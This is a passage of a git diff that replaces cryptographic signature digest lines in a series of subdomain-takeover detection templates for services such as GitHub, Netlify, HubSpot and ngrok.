4a0a00473045022100befcf0703d5c687d0e8d06d35107f716d0bd6ee5f48a9e72aa107e31a07eb3280220144cb22f0774ca689c1094b2eab6018c5c5c39c1ba4363ccefe112ba873341f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/agilecrm-takeover.yaml b/http/takeovers/agilecrm-takeover.yaml index 851804ae8d..21b8787e78 100644 --- a/http/takeovers/agilecrm-takeover.yaml +++ b/http/takeovers/agilecrm-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502203e5437cdfd4734103ae21b5624d49a86012197e68f1ef22d4c61fd6506d2fd6b02210087c84457ec74570230a4ef789f50de0e6ad5bb3bdc311ddf92f804922863588c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204514d60692de579393b1c08cc9b06a1a24792eaf9214a265d1a491a23ada865a0220186545367d102bf37f5ade841d1aaa79c9efad53f6382ed66f6ece2ea66a4a0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/aha-takeover.yaml b/http/takeovers/aha-takeover.yaml index 5621d77464..5f58297e2e 100644 --- a/http/takeovers/aha-takeover.yaml +++ b/http/takeovers/aha-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502210081e62f08cee1995440a0f533dac16d17a3d3e09858d21de29e4eb7768384812702204e28ac0c2110a91fb6eb08414f3cec591f0efff3b7e935cd6b23a82346138dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd7d1e44de4813c1599ecb80eaf24e252399563ca376820d4bf9a94bc12d7a52022100c9569950ef8607c55b3a210e477f257964fe2b80e2194d348623233c04c4936d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/airee-takeover.yaml b/http/takeovers/airee-takeover.yaml index 318077c51c..2c785db731 100644 --- a/http/takeovers/airee-takeover.yaml +++ b/http/takeovers/airee-takeover.yaml @@ -31,4 +31,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100cb3b0d821630b1eb25fed8fae0a01c86dfdd0a5c047890f73228940bacad89b9022100b885654efd91153696697c0aa418b20838ae50cf6fe9fc2afd7a119b36f9c69e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4ddfc8919c07e9db29bdd72be05edfaac5d1ed693083c9266b8e9172bec8acd022100a47829ee78cc63d8abe2deaf8fb8153965ad82864b2fc6a99ebc918ddcaf24a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/anima-takeover.yaml b/http/takeovers/anima-takeover.yaml index e1ef294bd5..87e82b3bd5 100644 --- a/http/takeovers/anima-takeover.yaml +++ b/http/takeovers/anima-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022052bc2aa8ee8306b3823bcb5602709089422854a4efc741cbe5fc42a38518a7270221009f05c449b7fddb5dadc6579dd533cf5c57db6b43308cedff609e52d8b97f112a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b202d8bf734fb90f74cabc194bc4f8647e06be941d1d8ec9d69d892da5cfc20022100f1ae66eb862e6e38adca193149f144653a2bf44def67f61f402d117f1ba05d26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/announcekit-takeover.yaml b/http/takeovers/announcekit-takeover.yaml index bc666ede07..b2b4189698 100644 --- a/http/takeovers/announcekit-takeover.yaml +++ b/http/takeovers/announcekit-takeover.yaml @@ -35,4 +35,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100abf4b3ac11f8489ae50ed7777d1f7d75274fa69a6f4a9fdb621096c7276890d9022100ddc4b39e3a090dfd6f23f0454b07cd6fc159fc4b9671168dbd4d3f85b626dbed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022035b65f99b0c4d38bd2f2ca155623e4bc9b7d93436ed3ad9b458766bfc067df49022100f02056039796807097598a83e4fcf95ecf6cda52c9997756ac580cbe1aaf015b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/bigcartel-takeover.yaml b/http/takeovers/bigcartel-takeover.yaml index 9ec12cd270..43b7da6358 100644 --- a/http/takeovers/bigcartel-takeover.yaml +++ b/http/takeovers/bigcartel-takeover.yaml @@ -34,4 +34,4 @@ http: - type: dsl dsl: - cname -# digest: 490a00463044022028493e5884364496cbe6db730031be69815e0db1681e8f82ceacc7cd72e7d35a022064ac6129e32c1bb9c265656259d8121e230e5339bced107b32285d2564920464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038fdc2f6bab50c6b12f602e400503ff484b6b4e0034920245adce71dda7884280221008f485fd8a96e00cf51ca3811380d70f49bbda121047c22b41b7b6059268b8cd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/bitbucket-takeover.yaml b/http/takeovers/bitbucket-takeover.yaml index b2f4f59272..5b2e5bb59b 100644 --- a/http/takeovers/bitbucket-takeover.yaml +++ b/http/takeovers/bitbucket-takeover.yaml @@ -36,4 +36,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100800b04f4ce1fd3e4172c69ae962d1f36497dae9f92fb9adfa008f59e03b34c57022100eaf82edf3723c0158c2bd6f95e845b39cec747746577fb827de72bf03a2bbbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f81ba9be1225350b670f5e459895832998d28401e4af1cea4dfea796058af766022100eb4f1471f8e05dc4ff5e4f58b93dfc2a1fbd15b08f818633d8e523a51627d2d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/campaignmonitor-takeover.yaml b/http/takeovers/campaignmonitor-takeover.yaml index 7954ed27c0..e540988bc8 100644 --- a/http/takeovers/campaignmonitor-takeover.yaml +++ b/http/takeovers/campaignmonitor-takeover.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100b819e2a332f9b5b7e20bb3d40809c79a572af68df43acc74cceec70c6ca2b263022100daabd6735cb9915204d98a7d66a3cf771c8485f50f54fa2d401f9726aaaf38ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099f4f2f696289495ffbda0c245a7ec207a33c4eb54a91cb4b708f6e3bef85f55022059038570c60cf136c3aea526f936484decf08f1f0b2f185f4bcaa27d8a151769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/canny-takeover.yaml b/http/takeovers/canny-takeover.yaml index 3653f0fccf..b3e902807d 100644 --- a/http/takeovers/canny-takeover.yaml +++ b/http/takeovers/canny-takeover.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100fdcb56474033a16495df92a420a76351d7817ea33497bf19673e71d271289ce2022100cfffee90b4b903e5be13da672bf2509c548c7b082d89337f5ad245230409697e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220770e39df4f083ffed2f6ab2979097afb195d68caf8e8d66c084f2781134304f40221009d865f0621997cf3048294248ef321534618ed194f47fa9501c5be899f0ad769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/cargo-takeover.yaml b/http/takeovers/cargo-takeover.yaml index bfbc0a4d7d..80d2f4143d 100644 --- a/http/takeovers/cargo-takeover.yaml +++ b/http/takeovers/cargo-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 490a00463044022039c5b3256b28da9c9e9221e0023c40b4bf59550b34299d1025a9e3752546cdc20220697f0d05275826042cd6694b7964d3f91b47cacc86e1a7f346d33f2b67793608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb000d48be5efa3ca13be3e0b90ccb0ab7187d63cb2ca1f2bc5a0aa56a8de8530221008e08ab7ba9810454cd59ccb3e976b0ca498930f668613d9729d6bfa8bc1e4eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/cargocollective-takeover.yaml b/http/takeovers/cargocollective-takeover.yaml index 3f95a21d51..5e1a387026 100644 --- a/http/takeovers/cargocollective-takeover.yaml +++ b/http/takeovers/cargocollective-takeover.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502207891f1026ddf30a2dcef1e667b9e29c941a2b79f0392a0d0ef4cd6d5a7cdc974022100fd75665d6b068730f9b891b0535047a188904f9babb359f3e93a1490025d71f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089e240cced69675301a64683ce58caa3ed03b862a662f6e0d561ce223ddd8e1a022005bd3bb29c35ee041a18c5940d9b181a19c3f55a4d7b2913a995d727505893d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/clever-takeover.yaml b/http/takeovers/clever-takeover.yaml index a71d985daa..d016e494b9 100644 --- a/http/takeovers/clever-takeover.yaml +++ b/http/takeovers/clever-takeover.yaml @@ -33,4 +33,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100997963360f12bfd0cfd2950139969b09b58f492fe8bb7d3e87105c8f39be376002203355a8edcf3dd6dd71a699ca4a01ad3499f7001b39e48c7cae5265064ab55a3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205583c47d8a30c20d7ff49a6042467de30b1e7b81a801dbcb21107c1d62cb5248022100e8d1b4f47827afc48ea77b3ea8ee6d125cb90f086682f861aa9f00cf7e6c621d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index b053c547f4..2621be50b0 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -37,4 +37,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022058ef15819ab6fb25b5f79436a3f8d581e504c0f6f92f9dc3c18fa2478bf3c3f80221009fa3274b5d611c04ce851a3c53d8af98e913475ec2a8c006bf80591531f6954a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205de00cae59b95526e672179156343a79f70809a10c4a829c45be3d4b951be846022100b767bd3a52e563064b692b1e88f27b6565071fead56841a53398530daf50bd4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/frontify-takeover.yaml b/http/takeovers/frontify-takeover.yaml index 84fc2838ac..1e35e8dbb6 100644 --- a/http/takeovers/frontify-takeover.yaml +++ b/http/takeovers/frontify-takeover.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a004830460221009c8f88d2710cb52115876d7245b631b675280b8c02b46e23284711ac5377fbac022100f9412dfc45bba2e7b8f47426ee6405789a9eaa8e4270d9a430c52efcba1a9ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073257d87b3c8f7bac57f11010374f90ebc1ad0ed82fa373cb8bc52f060a59a9f02207f2df96e3872cb18f759d103ee1eafa6100f1e1cb4d752047366abcd71da4c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gemfury-takeover.yaml b/http/takeovers/gemfury-takeover.yaml index 9af6946737..f9e44213c5 100644 --- a/http/takeovers/gemfury-takeover.yaml +++ b/http/takeovers/gemfury-takeover.yaml @@ -34,4 +34,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100a4a5a5c7f4cbdea4dfe6ba54f24e8d115c4b4ed97463e0b6f2f59089005693d402201739eab6a73212a6753bfc7014fef9f080667f4ecf1562df1d3ebdfe569a65b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220571a355c4f9008ce201f21b3909279c6d8dfd3002c250a5348cbbc981c81664002210089aba03c22651f2780f423c98b7958e0f104faa410c9d42c05c192e3ae32b6e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/getresponse-takeover.yaml b/http/takeovers/getresponse-takeover.yaml index ec935918f4..a33e6eb4a4 100644 --- a/http/takeovers/getresponse-takeover.yaml +++ b/http/takeovers/getresponse-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100c9544f43f7e76dae73b99c44544483505e22d05b811b3d3014ea7478651a13b50220183d82c1d47b04cd7433045c3b661617768399b5fde5465ae365d81b9ba8c1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d76baa24ad80c5c6c0922fb1454cff5c9d83026377ff846e2a98f49cbd9bd5402202130ab07c35c34f8587cf8b82b169ebdcd3cfcd9679a482f7bdc9e8262206e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index bbabf8e623..5e5f9ffacb 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -36,4 +36,5 @@ http: extractors: - type: dsl dsl: - - cname \ No newline at end of file + - cname +# digest: 4a0a00473045022100e6b14cd181facf1c0aba1842e068d1d51866155487fff9659c1f88c3c6c35975022039d00f6759d82ba24ea18af1822d439c0754836d3761a4c79034bc1127455551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gitbook-takeover.yaml b/http/takeovers/gitbook-takeover.yaml index 3fef52d089..7d5b5bff12 100644 --- a/http/takeovers/gitbook-takeover.yaml +++ b/http/takeovers/gitbook-takeover.yaml @@ -33,4 +33,4 @@ http: - type: dsl dsl: - cname -# digest: 490a00463044022007ba7ff01d235a698a165e83cd1ec53b8f0f2c1c9df81dc1d1c1c7263ab997ae02202a1d4d50779a1120aa7674e464dcf262df262770bd0b4f34c2508b625dc1b0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041ce103372a629e4b16b6ba89a114b1dc07cd35f1b61d2bd3a82799f77d470e80221008c10a92f967d9dc1be5454a1bd2c394fbcd8622420546bca2094973683cca974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml index 6fc39e9e2e..f203cd7512 100644 --- a/http/takeovers/github-takeover.yaml +++ b/http/takeovers/github-takeover.yaml @@ -39,4 +39,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100da69c3934ab685046db34fd5b530f9a94a05843b80c64b9bd0c124de5f99b3bc022100baeb8a7a60d2cc78907aa619a65bba8bfaff269182513a5260167813f14407bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b7beee88e3e0e1c06ded9baf41f69191e8a1c0b6b1c8ebaa8f62bb63555955e02202e591661ddfd155e90024902a0362d770ee08400fd497077696f1c39066b8aee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gohire-takeover.yaml b/http/takeovers/gohire-takeover.yaml index 02eb91c8ca..c90e6cceb8 100644 --- a/http/takeovers/gohire-takeover.yaml +++ b/http/takeovers/gohire-takeover.yaml @@ -34,4 +34,4 @@ http: - type: dsl dsl: - cname -# digest: 490a00463044022037b397c0657ab6c3ea60424bfe1551b5d4674a30c654fd687baee22a578595b2022051cd6752d29108a910e38993aea9fcb8b51bb6596d82f4f485cc8c21a81e939d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075bc75ceacf2c4fcf2ee2a3f45c68293414cb79afdefc2b68a040c1fc39b4fb40220637462e31cb129a25abc0c88e2c21c4b7798c34117c08c73ce475af28474cd3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/hatenablog-takeover.yaml b/http/takeovers/hatenablog-takeover.yaml index 4a8c0ccdbc..1c394046b4 100644 --- a/http/takeovers/hatenablog-takeover.yaml +++ b/http/takeovers/hatenablog-takeover.yaml @@ -31,4 +31,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a004830460221008f1bd167e0d54c56419cfacf1f579b4a94ec793afcd2d71e41178d2c9911970f022100ea66618ec13a8f8f92c100bf9172d271c29ac6c890aebdec3a5745077d0549ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9c697e484d81916ba0c634b5a354972b3d6674b8d0cc70080cc93c3283f5cb802207e982fcaeda7d5396d39503732857d71bb6e8b3bcaf827a06fdfbff04e5d50fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpdocs-takeover.yaml b/http/takeovers/helpdocs-takeover.yaml index cd7ec567f1..ec378bc780 100644 --- a/http/takeovers/helpdocs-takeover.yaml +++ b/http/takeovers/helpdocs-takeover.yaml @@ -33,4 +33,4 @@ http: - type: dsl dsl: - cname -# digest: 490a004630440220482c6b083ccbabb1e2158009605bfe5dcbccf91764b760ebdaf751144015b6db022038fc8950954039feeb1f93f637a0bc96e0e5c1f248fdfc15d231bd01ec86e675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d82cde825cdf533209ab56bc4487296e3aa5943d108f4099b680f57194dfabc102200cfba57cf5c0f2de1da27004766a9c35cd484e5d73acbe1c89712028da8888fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpjuice-takeover.yaml b/http/takeovers/helpjuice-takeover.yaml index 8005ecfff4..474f32bfd1 100644 --- a/http/takeovers/helpjuice-takeover.yaml +++ b/http/takeovers/helpjuice-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100a35d9fdeea4128eb38c04dea1b5d3693810c966a13e599dcc2be949fe36554820221009a7e1fa76dcfb51b1c2fe04202c129cf7b893465f48049feccaeb79258a0a366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a8637ae66caa8b31d4e3a5019c15e0dde6f8ae084bd818639c1d65af937b82402210088f40289323cccf1bfd1bdf666435da1f4324883967fa12f2779ff12254d178f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helprace-takeover.yaml b/http/takeovers/helprace-takeover.yaml index adc1f92aa2..ab5ca50976 100644 --- a/http/takeovers/helprace-takeover.yaml +++ b/http/takeovers/helprace-takeover.yaml @@ -31,4 +31,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022027d08153b33fe40911fd49617721948492c62cc3d3d544c406599e8961424af5022100943309fe155a4cf41828089ec841eaeadb44e39a7e7c66113725e3eb40bf14e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a97f94e7e0047572d7b6ae4a44e90d7a30b957b33f5f3fa477e2e4877fb352c002204093e6aec249410c5b51bdcae3891fa0a9ebd04f6a4526ba6fc2f49f76edf182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpscout-takeover.yaml b/http/takeovers/helpscout-takeover.yaml index ad5be727c2..e5a87ea32e 100644 --- a/http/takeovers/helpscout-takeover.yaml +++ b/http/takeovers/helpscout-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100a14491277e022059a4d27c53642a673066e07741fc8df713ef9fca58978f2036022100a50455f2613321de05c5f0d730176a9d9edaef962b414b6dd344438c18b8c47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203a9a8fcd1dc0a7a5f2b002d75787dce23d634fd04ed6e2bf6a41de1c0bfe0c6f022100da3fe1a70b7f7b76ee7d5515c7ab7c3de9300abc98d021178646d1a8a18a16e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/hubspot-takeover.yaml b/http/takeovers/hubspot-takeover.yaml index f1a2b35efe..efd5292f16 100644 --- a/http/takeovers/hubspot-takeover.yaml +++ b/http/takeovers/hubspot-takeover.yaml @@ -33,4 +33,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402206ce71ca779690190161ec883a0f6a10d9d38905219eba277ea6dfb04d7466cd4022027eb6f3bd3010a4a5d68befc5b652eac733f20cefb5f1f9019d1f5020f40e148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a9b933c7a405d09b7e01c0f4fdf1c3cb58a14f595371694a052dee1ffc867a7022100f8b5dc0bbb8790fb505a34eba555b174fa01f8304957f36ea8ca0572ea58e3b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/intercom-takeover.yaml b/http/takeovers/intercom-takeover.yaml index 123559faf5..70abec4ebf 100644 --- a/http/takeovers/intercom-takeover.yaml +++ b/http/takeovers/intercom-takeover.yaml @@ -32,4 +32,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a004830460221009aef81a7fc6a59a2ba6de62e3772517f8c0dd2b1fb2c9c7cd325f9a7bea24645022100c585d84759bd8e0084076b7b4f684e29e878e894f643e4a16f0ec7c17ddf2b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200779ac3926cc9ce532ac9a0c0886a17c301a5c1dfa37bb82ff74bcb741bb5ae1022100d356c8025ac9bccb01ce66425203a68da5f6f2cd19f2bdcf57b58c81f543dcdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/jazzhr-takeover.yaml b/http/takeovers/jazzhr-takeover.yaml index 720498589b..60c0d6147c 100644 --- a/http/takeovers/jazzhr-takeover.yaml +++ b/http/takeovers/jazzhr-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022029f3b863ed50f24393d86e83c928ff07f9eb39bdeefdcd9093120debbfcdf049022100a00a29f9bd49422c3ee702f888dedd6d166e73eee1b56732cff1e8939c938b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206833fee3a68c8e3bf502b5ae7f01287d91096b12bc2ff8b0950f0eff0233757f022100f1363a3e838c3409fad6dd108086b45130e7360fcdad28b1c27ca5971f5a50e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/jetbrains-takeover.yaml b/http/takeovers/jetbrains-takeover.yaml index 6125294f59..046dcbaa81 100644 --- a/http/takeovers/jetbrains-takeover.yaml +++ b/http/takeovers/jetbrains-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 490a0046304402205e36ff70f8a0907caca607574e3bba5cdf53e03b530dfc7418b8dd26746b6b3c02203a03022c7dd004ea62891eeda1133a8bbb4cf7596d269f047d4f2b5abe6d921f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039c274dcdc0c7c8b204e3d3529636ff47152cb4b32f6cb7c50cb7271679ae37b022100eb13ab1776d89bf6c48bea5c81dd1118f29c96a1bccd5185e2349e850570c3a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/kinsta-takeover.yaml b/http/takeovers/kinsta-takeover.yaml index a19db3cfad..b5c055033d 100644 --- a/http/takeovers/kinsta-takeover.yaml +++ b/http/takeovers/kinsta-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100c1180edbebb878f2804b827537d695ea36e9d3cab087819d029d1e89230fae4302203cd91b5cdc16051046d223660b4487a540a298336b4347f0e7c03f56cef75d73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ee0dba8a9989281047e4d62a09673dcfee938972b88f4cb71af297da546ea7b02204ea71cd96beef5e53bd25fbf5caa48587a781c71e8a372dd358e1135fcb10e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/launchrock-takeover.yaml b/http/takeovers/launchrock-takeover.yaml index 57430e88c4..01fe9a692e 100644 --- a/http/takeovers/launchrock-takeover.yaml +++ b/http/takeovers/launchrock-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022024aad780c453db09ec0aa72dc5d26dd07ea0307eefb7cbd8ad014380bfeca9d7022100ede17fb171220b83769a563fa26398d7be46bd50363522e38f008bb2b15c8cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a32478667681840c4e2d489c1cd6db0752c7ceb63a88c2332973c0b14ef57251022100fe486172fe4c2f073c5e5dff9cbde549e50b3b424b2187cd5c86026d3b740441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/leadpages-takeover.yaml b/http/takeovers/leadpages-takeover.yaml index 7753f735f6..1767a33439 100644 --- a/http/takeovers/leadpages-takeover.yaml +++ b/http/takeovers/leadpages-takeover.yaml @@ -35,4 +35,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100a7abea52b53bc6e3b854fe480b6ceddf1d28a773c7cb45b063cb84894dce86df0220023489a7dfa027e01a533d41eb0242aa9c7693238d060be9e9546e468c6b7c93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220203007c3d6ddbbaf62eb68034d07adca72ceec9a4450d65127b31e7cde4f251d0220534f0ed3c7123f2b08335513375ba14fc87cf63928cdb7580c13779f39998b12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/lemlist-takeover.yaml b/http/takeovers/lemlist-takeover.yaml index 19ccfb9965..7613e2adaa 100644 --- a/http/takeovers/lemlist-takeover.yaml +++ b/http/takeovers/lemlist-takeover.yaml @@ -34,4 +34,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100b12fa0b4978f85ed3cbe41639ef1128582cc49f9cbdf4a80f3a5bdb0be0bee31022045c0a3b23c1b9d3d1ef6be6d6259807aecab1191bf352df7c7f035044e3c5497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210087cff5b29fe3d2e7e6d3cf00af41334b7de1a4f9ef76ad9af08f1d6d700b9916022100a51b24c27a3f0a1fc72af5d426dc099546d39eb6f6b217310113c9027b216076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/mashery-takeover.yaml b/http/takeovers/mashery-takeover.yaml index 094f3acd89..3a0c66145f 100644 --- a/http/takeovers/mashery-takeover.yaml +++ b/http/takeovers/mashery-takeover.yaml @@ -30,4 +30,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502201149e8f9fc9b0d0351c9ad314e60423a0868e8fae542b3a1ac7993dba931ef1d0221008049d9334895aef36c83670111facb54c8a21f0d0c0fda7ac1fab4f2a5238075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f81920c736321bca10afd8fd56660a14b18cbf1d5f92160bc63360cf70df944e022100dd5f30cfe9487d27864e7e80f82d0cf7646d492f37e2531e29bcc02eb5b9a474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/meteor-takeover.yaml b/http/takeovers/meteor-takeover.yaml index be33d35a10..18a8f14adb 100644 --- a/http/takeovers/meteor-takeover.yaml +++ b/http/takeovers/meteor-takeover.yaml @@ -26,4 +26,4 @@ http: - type: dsl dsl: - cname -# digest: 4b0a00483046022100dd786b650d96f7b610f6fabb775fb0a1bdbdc399098915fed785dc96c4096290022100efa3ad374411b3b54f0901c2147f72f158c6e217fcf25d1ecc77b2ad9a38a28f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044e9dd247d96539bc796b57ad5f64b0c1dd8e55d81a8ee635133e6ad4858151e02203b6b9c51a9381dcd8ca483156058b271dfe2d77376bcf31c526e03f380e4ac93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/netlify-takeover.yaml b/http/takeovers/netlify-takeover.yaml index d5d4151761..7c8a44aa9f 100644 --- a/http/takeovers/netlify-takeover.yaml +++ b/http/takeovers/netlify-takeover.yaml @@ -39,4 +39,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a0047304502204764f51efe7fea4b2004ff43b29b32c53238303e8951f73f30fbf6bd76e1e7b8022100cb22252706a3c243c470c662f9f71fa85726f93f718d7fe53b3e5147a828750b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022051a231cb2777160f952b455a41a8493e5fa5ff0fb89d6193f322ed08a313c2f70220373a6432536a4c44f9ba5844afe08403ce8de5718ef5ec9dd8de11d6090f6d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/ngrok-takeover.yaml b/http/takeovers/ngrok-takeover.yaml index 91b4b8f8ac..1b7fc539a6 100644 --- a/http/takeovers/ngrok-takeover.yaml +++ b/http/takeovers/ngrok-takeover.yaml @@ -31,4 +31,4 @@ http: - type: dsl dsl: - cname -# digest: 4a0a00473045022100be3ad2b3fe9c69371245fb062c73d6fef40199eed88340cee28ff023664fa76202203c6a116f08d99806c26409d9284df5ac6c93e5c5886bb79b8824e8e641c55d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a0a55263c1570dd308367406324c7729b10a0e440834ddbba78c5bf2e3bfd34022100bfc485382c62128df1386e15261215293b2b0249f29a12ec98250bdef2660f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pagewiz-takeover.yaml b/http/takeovers/pagewiz-takeover.yaml index 25b1f618f2..1fd98cf34f 100644 --- a/http/takeovers/pagewiz-takeover.yaml +++ b/http/takeovers/pagewiz-takeover.yaml @@ -33,4 +33,4 @@ http: - type: dsl dsl: - cname -# digest: 